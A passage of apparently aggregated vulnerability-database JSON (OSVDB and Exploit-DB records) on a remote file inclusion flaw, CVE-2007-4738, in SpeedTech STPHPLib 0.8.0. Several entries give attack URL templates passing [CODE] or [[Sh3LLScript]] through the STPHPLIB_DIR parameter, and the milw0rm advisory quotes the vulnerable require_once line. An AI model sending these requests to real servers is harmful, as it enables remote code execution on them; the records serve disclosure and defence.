"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "cvelist": ["CVE-2007-4738"], "description": "## Vulnerability Description\nSpeedtech STPHPLib contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'stphpwindow.php' not properly sanitizing user input supplied to the 'STPHPLIB_DIR' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSpeedTech STPHPLib version 0.8.0 stphpwindow.php STPHPLIB_DIR variable remote file inclusion.\n\n## Manual Testing Notes\nhttp://[victim]/[stphplib_path]/stphpwindow.php?STPHPLIB_DIR=[CODE]\n## References:\nVendor URL: http://stphplib.sourceforge.net/\n[Secunia Advisory ID:26658](https://secuniaresearch.flexerasoftware.com/advisories/26658/)\n[Related OSVDB ID: 1016004](https://vulners.com/osvdb/OSVDB:1016004)\n[Related OSVDB ID: 39077](https://vulners.com/osvdb/OSVDB:39077)\n[Related OSVDB ID: 39084](https://vulners.com/osvdb/OSVDB:39084)\n[Related OSVDB ID: 39086](https://vulners.com/osvdb/OSVDB:39086)\n[Related OSVDB ID: 39087](https://vulners.com/osvdb/OSVDB:39087)\n[Related OSVDB ID: 39090](https://vulners.com/osvdb/OSVDB:39090)\n[Related OSVDB ID: 39091](https://vulners.com/osvdb/OSVDB:39091)\n[Related OSVDB ID: 39093](https://vulners.com/osvdb/OSVDB:39093)\n[Related OSVDB ID: 39098](https://vulners.com/osvdb/OSVDB:39098)\n[Related OSVDB ID: 39099](https://vulners.com/osvdb/OSVDB:39099)\n[Related OSVDB ID: 39074](https://vulners.com/osvdb/OSVDB:39074)\n[Related OSVDB ID: 39078](https://vulners.com/osvdb/OSVDB:39078)\n[Related OSVDB ID: 39088](https://vulners.com/osvdb/OSVDB:39088)\n[Related OSVDB ID: 39094](https://vulners.com/osvdb/OSVDB:39094)\n[Related OSVDB ID: 39096](https://vulners.com/osvdb/OSVDB:39096)\n[Related OSVDB ID: 39076](https://vulners.com/osvdb/OSVDB:39076)\n[Related OSVDB ID: 39080](https://vulners.com/osvdb/OSVDB:39080)\n[Related OSVDB ID: 39083](https://vulners.com/osvdb/OSVDB:39083)\n[Related OSVDB ID: 39085](https://vulners.com/osvdb/OSVDB:39085)\n[Related OSVDB ID: 39092](https://vulners.com/osvdb/OSVDB:39092)\n[Related OSVDB ID: 39097](https://vulners.com/osvdb/OSVDB:39097)\n[Related OSVDB ID: 39100](https://vulners.com/osvdb/OSVDB:39100)\n[Related OSVDB ID: 39102](https://vulners.com/osvdb/OSVDB:39102)\n[Related OSVDB ID: 39075](https://vulners.com/osvdb/OSVDB:39075)\n[Related OSVDB ID: 39079](https://vulners.com/osvdb/OSVDB:39079)\n[Related OSVDB ID: 39081](https://vulners.com/osvdb/OSVDB:39081)\n[Related OSVDB ID: 39082](https://vulners.com/osvdb/OSVDB:39082)\n[Related OSVDB ID: 39089](https://vulners.com/osvdb/OSVDB:39089)\n[Related OSVDB ID: 39095](https://vulners.com/osvdb/OSVDB:39095)\n[Related OSVDB ID: 39101](https://vulners.com/osvdb/OSVDB:39101)\n[Related OSVDB ID: 39104](https://vulners.com/osvdb/OSVDB:39104)\n[Related OSVDB ID: 39105](https://vulners.com/osvdb/OSVDB:39105)\nISS X-Force ID: 36417\nGeneric Exploit URL: http://milw0rm.com/exploits/4358\n[CVE-2007-4738](https://vulners.com/cve/CVE-2007-4738)\nBugtraq ID: 25525\n", "edition": 1, "modified": "2007-09-03T00:00:00", "published": "2007-09-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39103", "id": "OSVDB:39103", "title": "SpeedTech PHP Library stphpwindow.php STPHPLIB_DIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "cvelist": ["CVE-2007-4738"], "description": "## Vulnerability Description\nSpeedtech STPHPLib contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'stphpxmldoc.php' not properly sanitizing user input supplied to the 'STPHPLIB_DIR' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSpeedTech STPHPLib version 0.8.0 stphpxmldoc.php STPHPLIB_DIR variable remote file inclusion.\n\n## Manual Testing Notes\nhttp://[victim]/[stphplib_path]/stphpxmldoc.php?STPHPLIB_DIR=[CODE]\n## References:\nVendor URL: http://stphplib.sourceforge.net/\n[Secunia Advisory ID:26658](https://secuniaresearch.flexerasoftware.com/advisories/26658/)\n[Related OSVDB ID: 1016004](https://vulners.com/osvdb/OSVDB:1016004)\n[Related OSVDB ID: 39077](https://vulners.com/osvdb/OSVDB:39077)\n[Related OSVDB ID: 39084](https://vulners.com/osvdb/OSVDB:39084)\n[Related OSVDB ID: 39086](https://vulners.com/osvdb/OSVDB:39086)\n[Related OSVDB ID: 39087](https://vulners.com/osvdb/OSVDB:39087)\n[Related OSVDB ID: 39090](https://vulners.com/osvdb/OSVDB:39090)\n[Related OSVDB ID: 39091](https://vulners.com/osvdb/OSVDB:39091)\n[Related OSVDB ID: 39093](https://vulners.com/osvdb/OSVDB:39093)\n[Related OSVDB ID: 39098](https://vulners.com/osvdb/OSVDB:39098)\n[Related OSVDB ID: 39099](https://vulners.com/osvdb/OSVDB:39099)\n[Related OSVDB ID: 39103](https://vulners.com/osvdb/OSVDB:39103)\n[Related OSVDB ID: 39106](https://vulners.com/osvdb/OSVDB:39106)\n[Related OSVDB ID: 39078](https://vulners.com/osvdb/OSVDB:39078)\n[Related OSVDB ID: 39088](https://vulners.com/osvdb/OSVDB:39088)\n[Related OSVDB ID: 39094](https://vulners.com/osvdb/OSVDB:39094)\n[Related OSVDB ID: 39096](https://vulners.com/osvdb/OSVDB:39096)\n[Related OSVDB ID: 39076](https://vulners.com/osvdb/OSVDB:39076)\n[Related OSVDB ID: 39080](https://vulners.com/osvdb/OSVDB:39080)\n[Related OSVDB ID: 39083](https://vulners.com/osvdb/OSVDB:39083)\n[Related OSVDB ID: 39085](https://vulners.com/osvdb/OSVDB:39085)\n[Related OSVDB ID: 39092](https://vulners.com/osvdb/OSVDB:39092)\n[Related OSVDB ID: 39097](https://vulners.com/osvdb/OSVDB:39097)\n[Related OSVDB ID: 39100](https://vulners.com/osvdb/OSVDB:39100)\n[Related OSVDB ID: 39102](https://vulners.com/osvdb/OSVDB:39102)\n[Related OSVDB ID: 39075](https://vulners.com/osvdb/OSVDB:39075)\n[Related OSVDB ID: 39079](https://vulners.com/osvdb/OSVDB:39079)\n[Related OSVDB ID: 39081](https://vulners.com/osvdb/OSVDB:39081)\n[Related OSVDB ID: 39082](https://vulners.com/osvdb/OSVDB:39082)\n[Related OSVDB ID: 39089](https://vulners.com/osvdb/OSVDB:39089)\n[Related OSVDB ID: 39095](https://vulners.com/osvdb/OSVDB:39095)\n[Related OSVDB ID: 39101](https://vulners.com/osvdb/OSVDB:39101)\n[Related OSVDB ID: 39105](https://vulners.com/osvdb/OSVDB:39105)\nISS X-Force ID: 36417\nGeneric Exploit URL: http://milw0rm.com/exploits/4358\n[CVE-2007-4738](https://vulners.com/cve/CVE-2007-4738)\nBugtraq ID: 25525\n", "edition": 1, "modified": "2007-09-03T00:00:00", "published": "2007-09-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39104", "id": "OSVDB:39104", "title": "SpeedTech PHP Library stphpxmldoc.php STPHPLIB_DIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "cvelist": ["CVE-2007-4738"], "description": "## Vulnerability Description\nSpeedtech STPHPLib contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'stphpxmlelement.php' not properly sanitizing user input supplied to the 'STPHPLIB_DIR' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSpeedTech STPHPLib version 0.8.0 stphpxmlelement.php STPHPLIB_DIR variable remote file inclusion.\n\n## Manual Testing Notes\nhttp://[victim]/[stphplib_path]/stphpxmlelement.php?STPHPLIB_DIR=[CODE]\n## References:\nVendor URL: http://stphplib.sourceforge.net/\n[Secunia Advisory ID:26658](https://secuniaresearch.flexerasoftware.com/advisories/26658/)\n[Related OSVDB ID: 1016004](https://vulners.com/osvdb/OSVDB:1016004)\n[Related OSVDB ID: 39077](https://vulners.com/osvdb/OSVDB:39077)\n[Related OSVDB ID: 39084](https://vulners.com/osvdb/OSVDB:39084)\n[Related OSVDB ID: 39086](https://vulners.com/osvdb/OSVDB:39086)\n[Related OSVDB ID: 39087](https://vulners.com/osvdb/OSVDB:39087)\n[Related OSVDB ID: 39090](https://vulners.com/osvdb/OSVDB:39090)\n[Related OSVDB ID: 39091](https://vulners.com/osvdb/OSVDB:39091)\n[Related OSVDB ID: 39093](https://vulners.com/osvdb/OSVDB:39093)\n[Related OSVDB ID: 39098](https://vulners.com/osvdb/OSVDB:39098)\n[Related OSVDB ID: 39099](https://vulners.com/osvdb/OSVDB:39099)\n[Related OSVDB ID: 39103](https://vulners.com/osvdb/OSVDB:39103)\n[Related OSVDB ID: 39078](https://vulners.com/osvdb/OSVDB:39078)\n[Related OSVDB ID: 39088](https://vulners.com/osvdb/OSVDB:39088)\n[Related OSVDB ID: 39094](https://vulners.com/osvdb/OSVDB:39094)\n[Related OSVDB ID: 39096](https://vulners.com/osvdb/OSVDB:39096)\n[Related OSVDB ID: 39076](https://vulners.com/osvdb/OSVDB:39076)\n[Related OSVDB ID: 39080](https://vulners.com/osvdb/OSVDB:39080)\n[Related OSVDB ID: 39083](https://vulners.com/osvdb/OSVDB:39083)\n[Related OSVDB ID: 39085](https://vulners.com/osvdb/OSVDB:39085)\n[Related OSVDB ID: 39092](https://vulners.com/osvdb/OSVDB:39092)\n[Related OSVDB ID: 39097](https://vulners.com/osvdb/OSVDB:39097)\n[Related OSVDB ID: 39100](https://vulners.com/osvdb/OSVDB:39100)\n[Related OSVDB ID: 39102](https://vulners.com/osvdb/OSVDB:39102)\n[Related OSVDB ID: 39075](https://vulners.com/osvdb/OSVDB:39075)\n[Related OSVDB ID: 39079](https://vulners.com/osvdb/OSVDB:39079)\n[Related OSVDB ID: 39081](https://vulners.com/osvdb/OSVDB:39081)\n[Related OSVDB ID: 39082](https://vulners.com/osvdb/OSVDB:39082)\n[Related OSVDB ID: 39089](https://vulners.com/osvdb/OSVDB:39089)\n[Related OSVDB ID: 39095](https://vulners.com/osvdb/OSVDB:39095)\n[Related OSVDB ID: 39101](https://vulners.com/osvdb/OSVDB:39101)\n[Related OSVDB ID: 39104](https://vulners.com/osvdb/OSVDB:39104)\nISS X-Force ID: 36417\nGeneric Exploit URL: http://milw0rm.com/exploits/4358\n[CVE-2007-4738](https://vulners.com/cve/CVE-2007-4738)\nBugtraq ID: 25525\n", "edition": 1, "modified": "2007-09-03T00:00:00", "published": "2007-09-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39105", "id": "OSVDB:39105", "title": "SpeedTech PHP Library stphpxmlelement.php STPHPLIB_DIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-4738"], "description": "## Vulnerability Description\nSpeedtech STPHPLib contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'stphpbutton.php' not properly sanitizing user input supplied to the 'STPHPLIB_DIR' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSpeedTech STPHPLib version 0.8.0 stphpbutton.php STPHPLIB_DIR variable remote file inclusion.\n## Manual Testing Notes\nhttp://[victim]/[stphplib_path]/stphpbutton.php?STPHPLIB_DIR=[CODE]\n## References:\nVendor URL: http://stphplib.sourceforge.net/\n[Secunia Advisory ID:26658](https://secuniaresearch.flexerasoftware.com/advisories/26658/)\n[Related OSVDB ID: 39077](https://vulners.com/osvdb/OSVDB:39077)\n[Related OSVDB ID: 39084](https://vulners.com/osvdb/OSVDB:39084)\n[Related OSVDB ID: 39086](https://vulners.com/osvdb/OSVDB:39086)\n[Related OSVDB ID: 39087](https://vulners.com/osvdb/OSVDB:39087)\n[Related OSVDB ID: 39090](https://vulners.com/osvdb/OSVDB:39090)\n[Related OSVDB ID: 39091](https://vulners.com/osvdb/OSVDB:39091)\n[Related OSVDB ID: 39093](https://vulners.com/osvdb/OSVDB:39093)\n[Related OSVDB ID: 39098](https://vulners.com/osvdb/OSVDB:39098)\n[Related OSVDB ID: 39099](https://vulners.com/osvdb/OSVDB:39099)\n[Related OSVDB ID: 39103](https://vulners.com/osvdb/OSVDB:39103)\n[Related OSVDB ID: 39073](https://vulners.com/osvdb/OSVDB:39073)\n[Related OSVDB ID: 39078](https://vulners.com/osvdb/OSVDB:39078)\n[Related OSVDB ID: 39088](https://vulners.com/osvdb/OSVDB:39088)\n[Related OSVDB ID: 39094](https://vulners.com/osvdb/OSVDB:39094)\n[Related OSVDB ID: 39096](https://vulners.com/osvdb/OSVDB:39096)\n[Related OSVDB ID: 39076](https://vulners.com/osvdb/OSVDB:39076)\n[Related OSVDB ID: 39080](https://vulners.com/osvdb/OSVDB:39080)\n[Related OSVDB ID: 39083](https://vulners.com/osvdb/OSVDB:39083)\n[Related OSVDB ID: 39085](https://vulners.com/osvdb/OSVDB:39085)\n[Related OSVDB ID: 39092](https://vulners.com/osvdb/OSVDB:39092)\n[Related OSVDB ID: 39097](https://vulners.com/osvdb/OSVDB:39097)\n[Related OSVDB ID: 39100](https://vulners.com/osvdb/OSVDB:39100)\n[Related OSVDB ID: 39102](https://vulners.com/osvdb/OSVDB:39102)\n[Related OSVDB ID: 39075](https://vulners.com/osvdb/OSVDB:39075)\n[Related OSVDB ID: 39079](https://vulners.com/osvdb/OSVDB:39079)\n[Related OSVDB ID: 39081](https://vulners.com/osvdb/OSVDB:39081)\n[Related OSVDB ID: 39082](https://vulners.com/osvdb/OSVDB:39082)\n[Related OSVDB ID: 39089](https://vulners.com/osvdb/OSVDB:39089)\n[Related OSVDB ID: 39095](https://vulners.com/osvdb/OSVDB:39095)\n[Related OSVDB ID: 39101](https://vulners.com/osvdb/OSVDB:39101)\n[Related OSVDB ID: 39104](https://vulners.com/osvdb/OSVDB:39104)\n[Related OSVDB ID: 39105](https://vulners.com/osvdb/OSVDB:39105)\nISS X-Force ID: 36417\nGeneric Exploit URL: http://milw0rm.com/exploits/4358 \n[CVE-2007-4738](https://vulners.com/cve/CVE-2007-4738)\nBugtraq ID: 25525\n", "edition": 1, "modified": "2007-09-03T00:00:00", "published": "2007-09-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39074", "id": "OSVDB:39074", "title": "SpeedTech PHP Library stphpbutton.php STPHPLIB_DIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:44:33", "description": "STPHPLibrary (STPHPLIB_DIR) Remote File Inclusion Vulnerability. CVE-2007-4737,CVE-2007-4738. Webapps exploit for php platform", "published": "2007-09-03T00:00:00", "type": "exploitdb", "title": "STPHPLibrary STPHPLIB_DIR Remote File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4737", "CVE-2007-4738"], "modified": "2007-09-03T00:00:00", "id": "EDB-ID:4358", "href": "https://www.exploit-db.com/exploits/4358/", "sourceData": "?????__________________________________________?????\n????????_____________________________________???????\n???????????_________________________________????????\n??????????????_____________________________?????????\n????????????????__________________________??????????\n???????????????????______________________???????????\n?????????????????????___________________????????????\n??????????????????????_________________?????????????\n????????????????????????_______________?????????????\n??????????????????????????_____________?????????????\n___?????????????????????????__________??????????????\n_____?????????????????????????________??????????????\n________???????????????????????_______??????????????\n___________??????????????????????_____??????????????\n________________???????????????????___??????????????\n_____________________???????????????__??????????????\n___________________________????????????????????????_\n_____________________???????????????????????????____\n______________???????????????????????????????_______\n___________???????????????????????????????????______\n________????????????????????????????????????????____\n______????????_____??????????????????????????????___\n____?????????_______??????????????????????????????__\n__???????????_______???????????????????????????????_\n_?????????????_____?????????????????????????????????\n????????????????????????????????????????????????????\n????????????????????????????????????????????????????\n????????????????????????????????????????????????????\n????????????????????????????????????????????????????\n_??????????????????????????????????????????????????_\n__?????????????????????????????????????????????????_\n_____?????????????????????????????????????????????__\n_________????????????????????????????????????????___\n_______________??????????????????????????????????___\n_________________???????????????????????????????____\n_________________???????????????????????????________\n________________??????????_____??????????___________\n_________________?????_________?????_________?????__\n__________????_________????____________?????????____\n__________?????????????????_____??????????__________\n__________?????????????????___?????_________________\n__________?????______??????_________________________\n\n# SpeedTech PHP Library <= Remote File Inclusion Vulnerability\n#\n#Dork::(\n#\n#Vuln Code\n##############################################################################################\n#ERROR1:stphpapplication.php\n#require_once(\"$STPHPLIB_DIR/stphpobject.php\");<<< rfi coded.\n#\n#Other Files:\n# stphpapplication.php?STPHPLIB_DIR=[[Sh3LLScript]]\n# stphpbtnimage.php?STPHPLIB_DIR=[[Sh3LLScript]]\n# stphpform.php?STPHPLIB_DIR=[[Sh3LLScript]]\n# ........................................\n# ........................................\n# ........................................\n##############################################################################################\n#\n#http://php.html.it/script/vedi/1872/stphplibrary/\n#\n##############################################################################################\n#\n#LEETSECURITY.ORG <<<< sanal alemde bizde var\u00c3\u00bdz...\n############################################################################################\n#coded by ..Wocker..\n#\n#####special thanx:###..Str0ke..####..KEZZAP66345..####..Wocker..#############################\n##############################################################################################\n##############################################################################################\n\n# milw0rm.com [2007-09-03]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4358/"}]}